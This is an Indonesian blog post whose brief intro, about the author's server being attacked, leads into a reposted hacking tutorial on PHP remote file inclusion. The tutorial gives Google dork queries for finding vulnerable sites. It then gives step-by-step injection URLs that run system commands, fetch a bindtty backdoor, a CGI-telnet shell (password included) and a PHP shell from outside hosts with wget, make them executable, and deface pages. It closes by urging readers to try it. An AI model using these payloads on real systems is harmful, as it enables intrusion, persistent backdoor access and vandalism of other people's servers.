SUPER KIDDIES HACKING: “PHP SUPER BUGS”

Berhubung server ada yang diserang, aq cari-cari file artikel jamannya seneng2 begadang ma internet dan dunia ingin tau supper tinggi. Maaf semuanya sebenarnya dah tau caranya tapi “GAK ADA WAKTU UNTUK BETULIN BUG ITU” modusnya sih seperti ini( artikel dibawah ) , mudah-mudahan menjadi referensi bagi programer lain.

File dengan CHMOD 777 dari jaman gak enak dulu, waktu bikin web itu alamiah. Kenapa alamiah karena buat upload file misal image. Wah klo sampek ke HACK gini gimana? YAA nerubah struktur codingnya, tp WEK haduh kelamaan BOS. Cara paling yahut ya dengan upload file dengan sistem FTP. Yuuk coding lagi, ngaku programer males coding TELA sampean.

SUPER KIDDIES HACKING: “PHP SUPER BUGS”
Author : K-159
Chanel : #indohackinglink, #hackercrew
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
——————————————————————————————————–

1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts ”
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts ”
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd ”
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd ”
3.eksekusi file httpd tadi :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd
4. buka telnet ke IP target sesuai dg port bindttynya

II. install Cgi-telnet
1.buat url seperti ini :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl ”
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl ”
3. akses cgitelnet kita dengan membuka url :
http://www.target.com/cgi-bin/test.pl
masukkan passwordnya “n0fr13”

III. install shell php
1. buat url seperti ini :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php ”
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
http://www.target.com/target/log.php

IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html

thats all my friends. just try it !!! BUT DONT TRY ON MY SERVER -_-

Thank’s to Mamat

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: